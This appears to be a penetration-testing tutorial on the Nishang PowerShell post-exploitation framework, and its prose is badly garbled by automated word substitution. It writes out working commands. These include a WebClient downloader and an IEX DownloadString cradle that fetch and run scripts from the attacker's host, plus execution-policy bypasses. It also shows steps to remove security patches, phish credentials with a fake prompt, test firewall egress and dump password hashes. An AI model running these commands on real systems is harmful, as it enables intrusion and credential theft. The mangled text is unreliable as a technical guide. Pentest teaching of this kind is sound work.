Nishang: A Post-Exploitation Framework

Introduction

I was latterly doing an external penetration essay for i of our clients, where I got vanquish access to Windows Server 2012(Internal WebServer sitting behind an IPS) with Administrative Privileges. It also appears to accept an Antivirus installed on the arrangement every bit everything I was uploading on to the machine was beingness deleted on the fly. I was looking for all the possibilities to acquire or thence this problem, as well as decided to expire along with PowerShell. The 2nd yous create upward one's heed to expire along with PowerShell for your post exploitation, yous don’t actually demand to worry near writing your ain scripts to win the game, every bit at that topographic point are a couplet of options available online. One alongside them that I actually liked is Nishang. Although I accept been observing this framework correct from its inception, I never got a run a peril to utilisation it inwards the existent globe penetration tests before this.
If yous ever come upward across a province of affairs where yous demand to utilisation Nishang inwards your pentests, every bit long every bit yous accept RDP access to the remote machine, your life is easy. However, how do yous expire along when RDP is non available as well as all yous accept is a remote shell? This article serves yous every bit an introduction to how to utilisation Nishang when yous entirely accept a remote shell.

What is Nishang?

Nishang is an opened upward origin framework with a several powerful PowerShell scripts that yous tin utilisation during the post exploitation stage of your penetration test. It has many scripts categorized into diverse categories such every bit data gathering, scanning, privilege summit etc. This article volition comprehend some of those scripts inwards no specific order. The residual of the scripts are left to the readers every bit an exercise, since Nishang is good documented with some first-class assistance options.
The original finish of this article is to innovate Nishang as well as to demonstrate how to utilisation Nishang when yous accept remote vanquish on the target system.

Lab Setup:

Before yous start reading the article, at that topographic point are few points to note.

1. There are few payloads inwards Metasploit to acquire an interactive PowerShell console on the victim’s machine. It means, when yous utilisation them, yous volition acquire a remote PowerShell, where yous tin run your PowerShell cmdlets as well as scripts remotely.
2. Meterpreter doesn’t appear to operate good with PowerShell. This agency yous may non acquire an interactive PowerShell console when yous accept Meterpreter vanquish as well as endeavour to acquire PowerShell from it using the command “powershell.exe” on the command shell.
3. It is e'er skillful to larn things with a vanquish having express features, thence that yous volition acquire the best of out of what yous are learning. This agency nosotros accept a uncomplicated interactive vanquish obtained from the remote machine using Netcat.

Installation

The next figure shows a vanquish with Administrative privileges.

We volition utilisation this vanquish to utilisation Nishang as well as explore some of its scripts.
Nishang is available inwards Kali Linux nether “/usr/share/nishang/” directory. Alternatively, yous tin download it from the next link.
https://github.com/samratashok/nishang

Let’s begin.
When nosotros accept a remote shell, at that topographic point are few of options to execute PowerShell scripts. However, showtime yous demand to create upward one's heed betwixt the next 2 situations.

1. You desire to download your scripts on to the disk as well as and then execute.
2. Execute your scripts without touching the disk.

I am going with the showtime selection inwards this article. If yous are interested inwards selection 2, I accept given the method at the terminate of the article.

Uploading files onto the remote machine

The next 3-line script tin endure used to download your scripts on to the victim’s machine.
$client = New-Object System.Net.WebClient

$targetlocation = “http://192.168.56.103/Check-VM.ps1”

$client.DownloadFile($targetlocation,”Check-VM.ps1″)

We are downloading Check-VM.ps1 script onto the remote machine using the inwards a higher house script. Therefore, nosotros demand to create a file with the inwards a higher house script every bit its content. To do this, only type inwards the next commands i yesteryear i on the vanquish nosotros got.
echo $client = New-Object System.Net.WebClient > script.ps1

echo $targetlocation = “http://192.168.56.103/Check-VM.ps1” >> script.ps1

echo $client.DownloadFile($targetlocation,”Check-VM.ps1″) >> script.ps1

This looks every bit shown below.

Once, yous accept your script ready on the target system, run it every bit shown below thence that the script volition endure downloaded onto the remote machine.
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

As nosotros tin meet inwards the inwards a higher house figure, the Check-VM.ps1 script has been downloaded as well as it’s ready for action. Similarly, yous tin download whatsoever script that yous want.

Check-VM

The showtime script nosotros volition assay is Check-VM.ps1 that nosotros only downloaded. This script checks if the target machine is running within a VM. It checks for diverse signatures to determine if the machine is running within a Virtual Machine. For example, if a procedure called vboxtray.exe is running, it could endure virtual box. Similarly, if the next registry entry is found, it says that it is virtual box.

Doing this manually could endure troublesome. This script automates the whole procedure to simplify this task.
To run this script, nosotros demand to import the module showtime as well as and then telephone phone the business office “Check-VM”. Since nosotros are on a remote vanquish as well as it is non-interactive to run PowerShell scripts, utilisation the next one-liner to do the whole procedure at i shot.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Check-VM.ps1’; Check-VM}”

As shown inwards the inwards a higher house figure, the script has identified it every bit Virtual Box.

Port-Scan

The side yesteryear side script is Port-Scan. This is i of the most useful scripts of Nishang. Once if yous gain access to an internal machine, finding the internal IPs as well as scanning them for opened upward ports is e'er a crucial component of post exploitation. This script makes it rattling tardily to uncovering the alive IPs of a specified hit as well as scanning for opened upward ports.
Run the next script to banking concern jibe the alive IPs betwixt 192.168.56.101 as well as 192.168.56.105. After that, also scan for opened upward ports.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

Here is the Awesomeness! We flora a domain controller inwards the inwards a higher house lab network.

Remove-Update

If yous desire to take whatsoever patches installed on the target machine, this script is for you. Remove-Update script helps yous to take an update from the target machine.
First, let’s banking concern jibe the listing of hot fixes installed using the cmdlet “Get-Hotfix”.

Now, let’s assay to take the 2nd update KB2534366. Run the Remove-Update script every bit shown below.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

As nosotros tin meet inwards the inwards a higher house figure, the update has been removed. We tin crosscheck it yesteryear running the same cmdlet i time once again every bit shown below.

Success! The update has been removed.

Invoke-CredentialsPhish

This is a skillful script to do phishing as well as to have the username as well as password of the victim inwards clear text. The best component is yous volition acquire the correct username as well as password, every bit this phishing window doesn’t disappear until the victim enters the correct username as well as password.
Run the next script inwards the terminal.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

This volition opened upward a window on victim’s machine every bit shown below. Let’s showtime locomote inwards some random username as well as password.

After few seconds, this window volition reappear as well as the user has to locomote inwards the correct credentials to acquire rid of the window. This time, let’s locomote inwards the correct credentials.

Now, let’s meet what happened at our terminal. J

We got the username as well as password entered yesteryear the victim.

FireBuster

FireBuster is i of the rattling useful scripts to banking concern jibe the outbound ports that are opened through the firewall. This script tin endure tested using some other script called FireListener, which acts a listener to essay the connection. Since it is for testing purposes, I started Netcat listener on port 5555 as well as 5556 on attacker’s machine rather than using FireListener. Now, allow us run the next script to meet if these ports are allowed through the firewall to brand outbound connections.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\FireBuster.ps1’; FireBuster 192.168.56.103 5555-5556}”

As nosotros tin meet inwards the inwards a higher house figure, the victim machine is making outbound connections through the specified ports.
Let’s banking concern jibe it some other circular but this time, I blocked the outbound connections over port 5556 inwards my windows firewall on the victim’s machine.

Let’s run the script i to a greater extent than fourth dimension as well as uncovering the results.

Nice, nosotros tin meet that the port 5556 is non listed inwards the output this time.

Get-PassHashes

Dumping password hashes from the victim’s machine is i of the mutual things nosotros meet during post exploitation. Get-PassHashes dumps the password hashes from the victim’s machine. This module requires an elevated shell. Therefore, nosotros demand to bypass UAC on the remote shell.
On an elevated shell, run the next script.
Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Get-PassHashes.ps1’; Get-PassHashes}”

As nosotros tin meet inwards the inwards a higher house figure, nosotros got all the hashes.
If yous desire to know near UAC bypass concepts, delight become through the next mass written yesteryear me, where it is explained inwards detailed.
http://resources.infosecinstitute.com/download/post-exploitation-without-automated-tools/
If yous desire to download as well as execute the above-mentioned modules without touching the disk, yous tin utilisation the next method.
powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.56.103/Check-VM.ps1’); Check-VM”

The Road Ahead

There are many other useful scripts available inwards Nishang that tin endure used during our penetration tests as well as I am leaving them to the readers every bit an practice every bit the concept behind using whatsoever other script volition rest the same. Another PowerShell toolkit called PowerSploit has been discussed before on our blog, which tin endure flora here.
To know to a greater extent than near Nishang its latest updates, delight follow their weblog here.